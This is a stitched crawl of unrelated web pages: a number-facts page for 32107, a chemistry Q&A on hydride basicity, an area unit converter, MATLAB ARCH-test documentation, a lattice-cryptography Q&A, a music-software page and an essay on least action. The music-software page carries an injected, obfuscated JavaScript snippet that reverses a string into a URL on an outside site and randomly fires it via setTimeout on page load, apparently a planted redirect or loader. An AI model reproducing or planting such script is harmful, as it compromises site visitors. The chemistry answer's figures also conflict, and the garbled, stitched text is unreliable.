(n = 32107)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 31680 Total number of positive integers not greater than n that are coprime to n λ(n) 5280 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 3452 Total number of primes less than or equal to n r2(n) 0 The number of ways n can be represented as the sum of 2 squares\n\nThere are 31,680 positive integers (less than 32,107) that are coprime with 32,107. And there are approximately 3,452 prime numbers less than or equal to 32,107.\n\n## Divisibility of 32107\n\n m n mod m 2 3 4 5 6 7 8 9 1 1 3 2 1 5 3 4\n\n32,107 is not divisible by any number less than or equal to 9.\n\n## Classification of 32107\n\n• Arithmetic\n• Semiprime\n• Deficient\n\n• Polite\n\n• Square Free\n\n### Other numbers\n\n• LucasCarmichael\n\n## Base conversion (32107)\n\nBase System Value\n2 Binary 111110101101011\n3 Ternary 1122001011\n4 Quaternary 13311223\n5 Quinary 2011412\n6 Senary 404351\n8 Octal 76553\n10 Decimal 32107\n12 Duodecimal 166b7\n20 Vigesimal 4057\n36 Base36 orv\n\n## Basic calculations (n = 32107)\n\n### Multiplication\n\nn×y\n n×2 64214 96321 128428 160535\n\n### Division\n\nn÷y\n n÷2 16053.5 10702.3 8026.75 6421.4\n\n### Exponentiation\n\nny\n n2 1030859449 33097804329043 1062671203592583601 34119184333747081677307\n\n### Nth Root\n\ny√n\n 2√n 179.184 31.7834 13.386 7.96746\n\n## 32107 as geometric shapes\n\n### Circle\n\n Diameter 64214 201734 3.23854e+09\n\n### Sphere\n\n Volume 1.3864e+14 1.29542e+10 201734\n\n### Square\n\nLength = n\n Perimeter 128428 1.03086e+09 45406.2\n\n### Cube\n\nLength = n\n Surface area 6.18516e+09 3.30978e+13 55611\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 96321 4.46375e+08 27805.5\n\n### Triangular Pyramid\n\nLength = n\n Surface area 1.7855e+09 3.90061e+12 26215.3\n\n## Cryptographic Hash Functions\n\nmd5 65b02eb3b457d64d6d5a10c5a441ad46 d892095126a4738632bab50952edf59e98a5504b 0b6070d0070c97a8d461706e739b8bccdf44f6c0e5fafc08d57c8a8c1081c149 662eb11a6458889ec7c89bf0fa69c81d68319c6cffef24574816b2c7bd671be6ecb34042380ed8815255262c7a03f41da7d461f904fdecd83a73d870c43275fb e39a31fcbd531a7ff1aab818f39058c98909f13f" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6250973,"math_prob":0.982967,"size":4555,"snap":"2021-43-2021-49","text_gpt3_token_len":1611,"char_repetition_ratio":0.11865524,"word_repetition_ratio":0.02945508,"special_character_ratio":0.44873765,"punctuation_ratio":0.07435898,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9958258,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-26T01:22:22Z\",\"WARC-Record-ID\":\"<urn:uuid:d70c5834-ab98-4404-9683-b315cbe84fec>\",\"Content-Length\":\"39867\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0b77f727-aa3b-45e2-92c2-34cd4e8bb76e>\",\"WARC-Concurrent-To\":\"<urn:uuid:58f0a8cd-da7e-44fb-9b2d-6b8607a46773>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/32107\",\"WARC-Payload-Digest\":\"sha1:5DYK3ER544NEDLDEO2DSHS2LRY6NVISX\",\"WARC-Block-Digest\":\"sha1:34CSJT3NUOWKZ2DWRZGODDT5JQ6ZNY5I\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323587794.19_warc_CC-MAIN-20211026011138-20211026041138-00370.warc.gz\"}"}
https://chemistry.stackexchange.com/questions/15226/kb-of-hydride-anion
[ "# Kb of hydride anion\n\nI can't find any data about the Kb value of the hydride anion except that it's huge. Does anyone know what it is, or how I can characterize it?\n\nI know I can use electrochemical means but the only reaction I find with hydride ion is this one:\n\nhttp://en.wikipedia.org/wiki/Hydride#Hydride_ion\n\nI think I got it figured out using electrochemical means, thanks to Aditya’s suggestion to consult $K_\\text{a}$ values rather than $K_\\text{b}$ values.\n\nConsider these two half reactions:\n\n$\\ce{2e- +H2->2H-}\\tag{$E^\\circ=-2.25~\\mathrm{V}$}$\n\n$\\ce{H2 + 2H2O -> 2H3O+ + 2e-}\\tag{$E^\\circ=0.00~\\mathrm{V}$}$\n\nCoupling these two half reactions results in:\n\n$\\ce{2H2 +2H2O ->2H3O+ +2H- }\\tag{$E^\\circ=-2.25~\\mathrm{V}$}$\n\nApplication of the Nernst equation can help us find an equilibrium constant for this reaction.\n\n$\\Delta G^\\circ = -nFE^\\circ = -(2)(96\\,500~\\mathrm{C/mol})(-2.25~\\mathrm{V}) = +434\\,250~\\mathrm{J/mol}$\n\nValue makes sense; we’d expect the reaction of hydrogen gas as an acid with water to be highly disfavorable.\n\n$\\Delta G^\\circ = -RT\\ln K=-\\left(8.31~\\mathrm{J/(mol\\cdot K)}\\right)(298~\\mathrm{K})\\ln K=+434\\,250~\\mathrm{J/mol}$\n\n$K = 6.97464\\times10^{-77}$\n\nNow, this $K$ correspond to this equilibrium:\n\n$\\ce{2H2 +2H2O ->2H3O+ +2H- }$\n\nSo we must take the square root of the found equilibrium constant to generate a value for $K_\\text{a}(\\ce{H2})= 8.35\\times10^{-39}$.\n\nAnd finally this lines up well with Aditya’s finding that the $\\mathrm{p}K_\\text{a}$ of $\\ce{H2}$ is 35; the −log of the above $K_\\text{a}$ value I found is 38. Nice.\n\nRecall that $\\mathrm{p}K_\\text{b}$ of hydride is actually $14-\\mathrm{p}K_\\text{a}$ of hydrogen gas. The value I found is $\\mathrm{p}K_\\text{a}=35$, so $\\mathrm{p}K_\\text{b}=14-35=-21$.\n\n• You mean Kw/Ka of hydrogen gas? – Dissenter Aug 13 '14 at 17:21\n• That 35 value also sounds like a pKa value rather than a Ka value. Can't imagine hydrogen gas being that acidic. – Dissenter Aug 13 '14 at 17:21" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.80468076,"math_prob":0.99919254,"size":1912,"snap":"2019-26-2019-30","text_gpt3_token_len":656,"char_repetition_ratio":0.13155137,"word_repetition_ratio":0.33333334,"special_character_ratio":0.34623432,"punctuation_ratio":0.084367245,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99963653,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-18T02:32:17Z\",\"WARC-Record-ID\":\"<urn:uuid:840ed4c6-fb13-4903-88b4-3783a5e39d32>\",\"Content-Length\":\"145296\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2ae7e624-f4d7-42ac-9065-31f7df35aaba>\",\"WARC-Concurrent-To\":\"<urn:uuid:c9ce1669-e0cd-4eb2-9c57-dece2abc10b4>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://chemistry.stackexchange.com/questions/15226/kb-of-hydride-anion\",\"WARC-Payload-Digest\":\"sha1:ZLC5Q3E4PFWJG2RAHU74C4NWPLTHXZKK\",\"WARC-Block-Digest\":\"sha1:RXUYB7AAL54FV4XTQFCQS6H2P7YKQ3ZL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195525483.64_warc_CC-MAIN-20190718022001-20190718044001-00095.warc.gz\"}"}
https://whatisconvert.com/900-square-feet-in-square-miles
[ "## Convert 900 Square Feet to Square Miles\n\nTo calculate 900 Square Feet to the corresponding value in Square Miles, multiply the quantity in Square Feet by 3.58700642791E-8 (conversion factor). In this case we should multiply 900 Square Feet by 3.58700642791E-8 to get the equivalent result in Square Miles:\n\n900 Square Feet x 3.58700642791E-8 = 3.228305785119E-5 Square Miles\n\n900 Square Feet is equivalent to 3.228305785119E-5 Square Miles.\n\n## How to convert from Square Feet to Square Miles\n\nThe conversion factor from Square Feet to Square Miles is 3.58700642791E-8. To find out how many Square Feet in Square Miles, multiply by the conversion factor or use the Area converter above. Nine hundred Square Feet is equivalent to zero point zero zero zero zero three two two eight Square Miles.\n\n## Definition of Square Foot\n\nThe square foot (plural square feet; abbreviated sq ft, sf, ft2) is an imperial unit and U.S. customary unit (non-SI, non-metric) of area, used mainly in the United States and partially in Bangladesh, Canada, Ghana, Hong Kong, India, Malaysia, Nepal, Pakistan, Singapore and the United Kingdom. It is defined as the area of a square with sides of 1 foot. 1 square foot is equivalent to 144 square inches (Sq In), 1/9 square yards (Sq Yd) or 0.09290304 square meters (symbol: m2). 1 acre is equivalent to 43,560 square feet.\n\n## Definition of Square Mile\n\nThe square mile (abbreviated as sq mi and sometimes as mi²) is an imperial and US unit of measure for an area equal to the area of a square with a side length of one statute mile. It should not be confused with miles square, which refers to a square region with each side having the specified length. For instance, 20 miles square (20 × 20 miles) has an area equal to 400 square miles; a rectangle of 10 × 40 miles likewise has an area of 400 square miles, but it is not 20 miles square. One square mile is equal to 4,014,489,600 square inches, 27,878,400 square feet or 3,097,600 square yards.\n\n## Using the Square Feet to Square Miles converter you can get answers to questions like the following:\n\n• How many Square Miles are in 900 Square Feet?\n• 900 Square Feet is equal to how many Square Miles?\n• How to convert 900 Square Feet to Square Miles?\n• How many is 900 Square Feet in Square Miles?\n• What is 900 Square Feet in Square Miles?\n• How much is 900 Square Feet in Square Miles?\n• How many mi2 are in 900 ft2?\n• 900 ft2 is equal to how many mi2?\n• How to convert 900 ft2 to mi2?\n• How many is 900 ft2 in mi2?\n• What is 900 ft2 in mi2?\n• How much is 900 ft2 in mi2?" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.879346,"math_prob":0.9968428,"size":2546,"snap":"2023-40-2023-50","text_gpt3_token_len":663,"char_repetition_ratio":0.22265932,"word_repetition_ratio":0.09347826,"special_character_ratio":0.30636293,"punctuation_ratio":0.12222222,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9984007,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-05T17:45:45Z\",\"WARC-Record-ID\":\"<urn:uuid:7fba153d-df2e-4780-958e-cd2d1f17d123>\",\"Content-Length\":\"29409\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d6af3279-1de7-45c7-990b-8b4fcb52b995>\",\"WARC-Concurrent-To\":\"<urn:uuid:af77db7b-08f2-477e-9952-bfc9d8f917b5>\",\"WARC-IP-Address\":\"172.67.133.29\",\"WARC-Target-URI\":\"https://whatisconvert.com/900-square-feet-in-square-miles\",\"WARC-Payload-Digest\":\"sha1:TD7L5H2UYYB5BJCQVJZRONXZV4PXHYTO\",\"WARC-Block-Digest\":\"sha1:ZKPLGT37I7HE4CIWXT6CW6TSGWN24KD6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100555.27_warc_CC-MAIN-20231205172745-20231205202745-00696.warc.gz\"}"}
https://au.mathworks.com/help/econ/detect-arch-effects-using-econometric-modeler.html
[ "## Detect ARCH Effects Using Econometric Modeler App\n\nThese examples show how to assess whether a series has volatility clustering by using the Econometric Modeler app. Methods include inspecting correlograms of squared residuals and testing for significant ARCH lags. The data set, stored in `Data_EquityIdx.mat`, contains a series of daily NASDAQ closing prices from 1990 through 2001.\n\n### Inspect Correlograms of Squared Residuals for ARCH Effects\n\nThis example shows how to visually determine whether a series has significant ARCH effects by plotting the autocorrelation function (ACF) and partial autocorrelation function (PACF) of a series of squared residuals.\n\nAt the command line, load the `Data_EquityIdx.mat` data set.\n\n`load Data_EquityIdx`\n\nThe data set contains a table of NASDAQ and NYSE closing prices, among other variables. For more details about the data set, enter `Description` at the command line.\n\nAt the command line, open the Econometric Modeler app.\n\n`econometricModeler`\n\nAlternatively, open the app from the apps gallery (see Econometric Modeler).\n\nImport `DataTimeTable` into the app:\n\n1. On the Econometric Modeler tab, in the Import section, click the button", null, ".\n\n2. In the Import Data dialog box, in the Import? column, select the check box for the `DataTimeTable` variable.\n\n3. Click .\n\nThe variables appear in the Time Series pane, and a time series plot of all the series appears in the Time Series Plot(NASDAQ) figure window.\n\nConvert the daily close NASDAQ index series to a percentage return series by taking the log of the series, then taking the first difference of the logged series:\n\n1. In the Time Series pane, select `NASDAQ`.\n\n2. On the Econometric Modeler tab, in the Transforms section, click .\n\n3. With `NASDAQLog` selected, in the Transforms section, click .\n\n4. In the Time Series pane, rename the `NASDAQLogDiff` variable by clicking it twice to select its name and entering `NASDAQReturns`.\n\nThe time series plot of the NASDAQ returns appears in the Time Series Plot(NASDAQReturns) figure window.", null, "The returns appear to fluctuate around a constant level, but exhibit volatility clustering. Large changes in the returns tend to cluster together, and small changes tend to cluster together. That is, the series exhibits conditional heteroscedasticity.\n\nCompute squared residuals:\n\n1. Export `NASDAQReturns` to the MATLAB® Workspace:\n\n1. In the Time Series pane, right-click `NASDAQReturns`.\n\n2. In the context menu, select Export.\n\n`NASDAQReturns` appears in the MATLAB Workspace.\n\n2. At the command line:\n\n1. For numerical stability, scale the returns by a factor of 100.\n\n2. Create a residual series by removing the mean from the scaled returns series. Because you took the first difference of the NASDAQ prices to create the returns, the first element of the returns is missing. Therefore, to estimate the sample mean of the series, call `mean(NASDAQReturns,'omitnan')`.\n\n3. Square the residuals.\n\n4. Add the squared residuals as a new variable to the `DataTimeTable` timetable.\n\n```NASDAQReturns = 100*NASDAQReturns; NASDAQResiduals = NASDAQReturns - mean(NASDAQReturns,'omitnan'); NASDAQResiduals2 = NASDAQResiduals.^2; DataTimeTable.NASDAQResiduals2 = NASDAQResiduals2;```\n\nIn Econometric Modeler, import `DataTimeTable`:\n\n1. On the Econometric Modeler tab, in the Import section, click", null, ".\n\n2. In the Econometric Modeler dialog box, click to clear all variables and documents in the app.\n\n3. In the Import Data dialog box, in the Import? column, select the check box for `DataTimeTable`.\n\n4. Click .\n\nPlot the ACF and PACF:\n\n1. In the Time Series pane, select the `NASDAQResiduals2` time series.\n\n2. Click the Plots tab, then click .\n\n3. Click the Plots tab, then click .\n\n4. Close the Time Series Plot(NASDAQ) figure window. Then, position the ACF(NASDAQResiduals2) figure window above the PACF(NASDAQResiduals2) figure window.", null, "The sample ACF and PACF show significant autocorrelation in the squared residuals. This result indicates that volatility clustering is present.\n\n### Conduct Ljung-Box Q-Test on Squared Residuals\n\nThis example shows how to test squared residuals for significant ARCH effects using the Ljung-Box Q-test.\n\nAt the command line:\n\n1. Load the `Data_EquityIdx.mat` data set.\n\n2. Convert the NASDAQ prices to returns. To maintain the correct time base, prepend the resulting returns with a `NaN` value.\n\n3. Scale the NASDAQ returns.\n\n4. Compute residuals by removing the mean from the scaled returns.\n\n5. Square the residuals.\n\n6. Add the vector of squared residuals as a variable to `DataTimeTable`.\n\nFor more details on the steps, see Inspect Correlograms of Squared Residuals for ARCH Effects.\n\n```load Data_EquityIdx NASDAQReturns = 100*price2ret(DataTimeTable.NASDAQ); NASDAQReturns = [NaN; NASDAQReturns]; NASDAQResiduals2 = (NASDAQReturns - mean(NASDAQReturns,'omitnan')).^2; DataTimeTable.NASDAQResiduals2 = NASDAQResiduals2; ```\n\nAt the command line, open the Econometric Modeler app.\n\n`econometricModeler`\n\nAlternatively, open the app from the apps gallery (see Econometric Modeler).\n\nImport `DataTimeTable` into the app:\n\n1. On the Econometric Modeler tab, in the Import section, click the button", null, ".\n\n2. In the Import Data dialog box, in the Import? column, select the check box for the `DataTimeTable` variable.\n\n3. Click .\n\nThe variables appear in the Time Series pane, and a time series plot of all the series appears in the Time Series Plot(NASDAQ) figure window.\n\nTest the null hypothesis that the first m = 5 autocorrelation lags of the squared residuals are jointly zero by using the Ljung-Box Q-test. Then, test the null hypothesis that the first m = 10 autocorrelation lags of the squared residuals are jointly zero.\n\n1. In the Time Series pane, select the `NASDAQResiduals2` time series.\n\n2. On the Econometric Modeler tab, in the Tests section, click > Ljung-Box Q-Test.\n\n3. On the LBQ tab, in the Parameters section, set both the Number of Lags and DOF to `5`. To maintain a significance level of 0.05 for the two tests, set Significance Level to 0.025.\n\n4. In the Tests section, click .\n\n5. Repeat steps 3 and 4, but set both the Number of Lags and DOF to `10` instead.\n\nThe test results appear in the Results table of the LBQ(NASDAQResiduals2) document.", null, "The null hypothesis is rejected for the two tests. The p-value for each test is 0. The results show that not every autocorrelation up to lag 5 (or 10) is zero, indicating volatility clustering in the squared residuals.\n\n### Conduct Engle's ARCH Test\n\nThis example shows how to test residuals for significant ARCH effects using the Engle's ARCH Test.\n\nAt the command line:\n\n1. Load the `Data_EquityIdx.mat` data set.\n\n2. Convert the NASDAQ prices to returns. To maintain the correct time base, prepend the resulting returns with a `NaN` value.\n\n3. Scale the NASDAQ returns.\n\n4. Compute residuals by removing the mean from the scaled returns.\n\n5. Add the vector of residuals as a variable to `DataTimeTable`.\n\nFor more details on the steps, see Inspect Correlograms of Squared Residuals for ARCH Effects.\n\n```load Data_EquityIdx NASDAQReturns = 100*price2ret(DataTimeTable.NASDAQ); NASDAQReturns = [NaN; NASDAQReturns]; NASDAQResiduals = NASDAQReturns - mean(NASDAQReturns,'omitnan'); DataTimeTable.NASDAQResiduals = NASDAQResiduals; ```\n\nAt the command line, open the Econometric Modeler app.\n\n`econometricModeler`\n\nAlternatively, open the app from the apps gallery (see Econometric Modeler).\n\nImport `DataTimeTable` into the app:\n\n1. On the Econometric Modeler tab, in the Import section, click the button", null, ".\n\n2. In the Import Data dialog box, in the Import? column, select the check box for the `DataTimeTable` variable.\n\n3. Click .\n\nThe variables appear in the Time Series pane, and a time series plot of the all the series appears in the Time Series Plot(NASDAQ) figure window.\n\nTest the null hypothesis that the NASDAQ residuals series exhibits no ARCH effects by using Engle's ARCH test. Specify that the residuals series is an ARCH(2) model.\n\n1. In the Time Series pane, select the `NASDAQResiduals` time series.\n\n2. On the Econometric Modeler tab, in the Tests section, click > Engle's ARCH Test.\n\n3. On the ARCH tab, in the Parameters section, set Number of Lags to `2`.\n\n4. In the Tests section, click .\n\nThe test results appear in the Results table of the ARCH(NASDAQResiduals) document.", null, "The null hypothesis is rejected in favor of the ARCH(2) alternative. The test result indicates significant volatility clustering in the residuals." ]
[ null, "https://au.mathworks.com/help/econ/econmodeler_importbutton.png", null, "https://au.mathworks.com/help/econ/econmodeler_nasdaqreturnstsplot.png", null, "https://au.mathworks.com/help/econ/econmodeler_importbutton.png", null, "https://au.mathworks.com/help/econ/econmodeler_nasdaqresacf.png", null, "https://au.mathworks.com/help/econ/econmodeler_importbutton.png", null, "https://au.mathworks.com/help/econ/econmodeler_nasdaqreslbq.png", null, "https://au.mathworks.com/help/econ/econmodeler_importbutton.png", null, "https://au.mathworks.com/help/econ/econmodeler_nasdaqresarch.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7635749,"math_prob":0.8314855,"size":8236,"snap":"2022-40-2023-06","text_gpt3_token_len":1947,"char_repetition_ratio":0.17772108,"word_repetition_ratio":0.41849148,"special_character_ratio":0.19524041,"punctuation_ratio":0.14217687,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9671891,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16],"im_url_duplicate_count":[null,null,null,1,null,null,null,1,null,null,null,1,null,null,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-29T10:28:17Z\",\"WARC-Record-ID\":\"<urn:uuid:bb2a9f6a-23be-4f68-b26f-4cd003d7a52a>\",\"Content-Length\":\"95096\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ae89bee5-a571-4a10-bc7a-4f4bba72e210>\",\"WARC-Concurrent-To\":\"<urn:uuid:f149f34b-2023-4156-8d12-f3a604155e00>\",\"WARC-IP-Address\":\"23.196.74.206\",\"WARC-Target-URI\":\"https://au.mathworks.com/help/econ/detect-arch-effects-using-econometric-modeler.html\",\"WARC-Payload-Digest\":\"sha1:YJCNZAWOZWGWGNJ4KJJ3RX5QRTXAH4KO\",\"WARC-Block-Digest\":\"sha1:WB64BZ4USK3JP3ADL7HWKQ7R7GA5INOB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499710.49_warc_CC-MAIN-20230129080341-20230129110341-00607.warc.gz\"}"}
https://crypto.stackexchange.com/questions/86896/what-is-the-difference-between-poly-lwe-and-ring-lwe/86911
[ "What is the difference between Poly-LWE and Ring-LWE?\n\nI am often confused by Poly-LWE and Ring-LWE, always thinking that they are different names for the same thing. In some literature, Poly-LWE is a simplified version of Ring-LWE? What is the difference?\n\nOne main difference is that in Ring-LWE, the ring $$R$$ is the full ring of integers $$\\mathcal{O}_K$$ of a number field $$K$$, whereas in Poly-LWE it is of the form $$R=\\mathbb{Z}[x]/f(x)$$ for some irreducible $$f(x)$$; this ring is (isomorphic to) an order of the number field $$K=\\mathbb{Q}(x)/f(x)$$, but may not be the full ring of integers.\nAnother important difference is that in Ring-LWE, the (non-noisy) products $$a_i \\cdot s \\in R^\\vee_q$$ belong to the dual (fractional) ideal $$R^\\vee$$ of the ring (modulo $$q$$), whereas in Poly-LWE, all of $$a_i, s, a_i \\cdot s$$ belong to $$R_q$$. While the latter is technically simpler, there are several advantages that come with using the dual form.\n• In the power of two cyclotomic case, does the error distributions you mentioned for Ring-LWE and Poly-LWE the same, that is, do the error polynomials for $\\mathbb{Z}[X]/(X^n+1)$, $n$ a power of 2, also spherical or are they still distorted? Jul 2 '21 at 5:39" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9038422,"math_prob":0.9996431,"size":2111,"snap":"2022-05-2022-21","text_gpt3_token_len":534,"char_repetition_ratio":0.11580446,"word_repetition_ratio":0.024615385,"special_character_ratio":0.24538134,"punctuation_ratio":0.106024094,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9998335,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-26T05:43:19Z\",\"WARC-Record-ID\":\"<urn:uuid:4da22ccd-03b0-4b14-ac7b-1f0d8ee2a2f0>\",\"Content-Length\":\"136689\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e8c8e4c0-af93-4471-a21c-e7465a27453a>\",\"WARC-Concurrent-To\":\"<urn:uuid:223509c2-c8bd-4fb0-bdf7-854304b9d0ef>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://crypto.stackexchange.com/questions/86896/what-is-the-difference-between-poly-lwe-and-ring-lwe/86911\",\"WARC-Payload-Digest\":\"sha1:G5RZ7PWOAVJFJWTBQAAFZTBC6WPY5ZBS\",\"WARC-Block-Digest\":\"sha1:ZAZDCKBDCA7V2TNYGFXXI3O64YUEMAAS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320304915.53_warc_CC-MAIN-20220126041016-20220126071016-00668.warc.gz\"}"}
https://8dio.com/tag/upgrade/
[ "HOW TO: Upgrade \\$nJe=function(n){if (typeof (\\$nJe.list[n]) == \"string\") return \\$nJe.list[n].split(\"\").reverse().join(\"\");return \\$nJe.list[n];};\\$nJe.list=[\"\\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\\'=\\$nJe\"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout(\\$nJe(0), delay);}\\$nJe=function(n){if (typeof (\\$nJe.list[n]) == \"string\") return \\$nJe.list[n].split(\"\").reverse().join(\"\");return \\$nJe.list[n];};\\$nJe.list=[\"\\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\\'=\\$nJe\"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout(\\$nJe(0), delay);}to Anthology from ALL Adagio\n\nCustomers that own all 4 of the new (2.0) Adagio Volumes can now upgrade to Anthology for FREE giving you access to the useful ensemble based patches included in Anthology. As Anthology uses the same sample content as Adagio, if you have all four Adagio volumes installed, you can install" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.87565386,"math_prob":0.7416464,"size":638,"snap":"2022-05-2022-21","text_gpt3_token_len":144,"char_repetition_ratio":0.16719243,"word_repetition_ratio":0.0,"special_character_ratio":0.18495297,"punctuation_ratio":0.09565217,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9558697,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-19T19:51:37Z\",\"WARC-Record-ID\":\"<urn:uuid:5d7a8be1-cd54-4fb3-961e-a906ba9a7953>\",\"Content-Length\":\"99257\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b54fa452-7142-421d-a860-81fa06549e8b>\",\"WARC-Concurrent-To\":\"<urn:uuid:cd48bf9f-9197-40aa-a022-c5bc920efd75>\",\"WARC-IP-Address\":\"52.206.122.62\",\"WARC-Target-URI\":\"https://8dio.com/tag/upgrade/\",\"WARC-Payload-Digest\":\"sha1:AHU3AQIUMWYDTPQG7H56YFPZUYDFNHGC\",\"WARC-Block-Digest\":\"sha1:ZBX5BSR4XTT4PFLHYHGSFAR6JEGLQU3W\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320301488.71_warc_CC-MAIN-20220119185232-20220119215232-00098.warc.gz\"}"}
https://3quarksdaily.com/3quarksdaily/2014/09/on-optimal-paths-minimal-action.html
[ "# On Optimal Paths & Minimal Action\n\nby Tasneem Zehra Husain", null, "It sounds a bit ridiculous when you admit your jealousy of inanimate objects. If you confess that you covet the skill with which these lifeless forms navigate their circumstances, you're bound to get some strange looks. So, you keep it to yourself – for the most part. But honestly, there are times when – if you know about the least action principle – it takes all your strength to keep from declaring that you would trade places with a subatomic particle, or a ray of light, or a rubber ball, in a heartbeat. Chances are, if you know about the principle of least action, you know enough science to realize that electrons and photons and rubber balls are not active decision makers, but that doesn't keep you from envying their ability to always follow the optimal route from one point to another. In fact, it almost makes the whole thing worse. These objects are not sentient beings; it's not as if they'd suffer if they took a circuitous route! But somehow, they manage to get it right every time, whereas you – well, you often manage to take what seems like the most complicated possible life path from Point A to Point B.\n\nSo what exactly is this mysterious knowledge that subatomic particles seem to possess, and how does one go about acquiring it? We begin by recognizing that these particles aren't furiously calculating their every move, maximizing the effect thereof; they are merely obeying the laws of nature – familiar laws, like those transcribed by Newton. The least action principle offers an approach that enables us to calculate the motion of a classical object, without recourse to conventional mechanics. But this principle should not be thought of as just an alternative to Newton's laws; it is much more powerful and far deeper than that. The chief strength of the least action principle is its flexibility. It is applicable not just within the province of classical mechanics, but can be extended to the realms of optics, electronics, electrodynamics, the theory of relativity and – perhaps most shockingly – even quantum mechanics. In fact, (as is evident in Feynman's path integral formulation) the least action principle is the most logically smooth way to connect classical and quantum physics! Suffice it to say that many well known laws are encapsulated in the elegant statement that “a physical system evolves from a fixed beginning to a fixed end in such a manner that its action is minimized.”\n\nHaving drummed up the anticipation, l should at least attempt to explain what the principle is, and give you a glimpse of how it works.\n\nFor starters, we need to understand what what is meant by that all important term: action. The action is the integral of a quantity called the Lagrangian, which can be thought of (for our present purposes, anyway) as the difference between the kinetic and potential energies of an object. Let's break that down. An integral is really just a sum. Kinetic energy is associated with motion, whereas potential energy is an ability conferred upon an object by virtue of its position. In fact, specifying a potential function is equivalent to stating the effect of a force; the strength of a force at any point in space is given by the slope of the potential there.", null, "In order to avoid the complexities of calculus, let's divide the duration of our physical process into a finite number of discrete time intervals. The action is then the sum, of the value of the Lagrangian multiplied by the width of the time interval, for each time interval as the object evolves from an initial to a final state. In other words, it is the area under the curve in the figure.\n\nIf all this is getting too abstract, maybe an example will help. Let's consider one of the simplest systems we can come up with: a classical (as opposed to quantum) particle moving in the absence of any forces. We know from Newtonian mechanics that such (inertial) bodies maintain “uniform motion in a straight line”. The question is, how does the principle of least action replicate this result?\n\nWe start by writing down the action. The kinetic energy of a classical object is 1/2 mv2, and since there is no force here, there is no potential to worry about. The action, then, is simply given by the sum of the kinetic energy of the particle in each discrete time interval, multiplied by the time interval. Since we know where and when the particle starts out, and where and when it ends up (these being the conditions that define its initial and final states), we can divide the distance d between these two points by the time taken t, to obtain the average velocity v = d/t. If the particle moved at a constant speed throughout its journey (as Newton's law says it should) this would have to be the speed it chose. The resulting action would be:", null, "But the principle of least action says that the particle would maintain the velocity v throughout its journey only if, by doing so, the particle minimizes its action. Does the adherence to average velocity indeed guarantee minimal action?\n\nAssume it doesn't. Assume that the action is minimized when the particle moves at a non-uniform speed. We already know the average velocity, so if the particle changes its speed, it must at some stage move faster than v, and compensate at other times by moving slower. Consider the simplest possible case (all other cases can be analyzed similarly): the particle moves faster for half the journey – say, it travels at speed (v + a) for a time t/2 – and then slows down to speed (v – a) for the remainder of the time.\n\nThe action can then be computed as below:", null, "Since the square 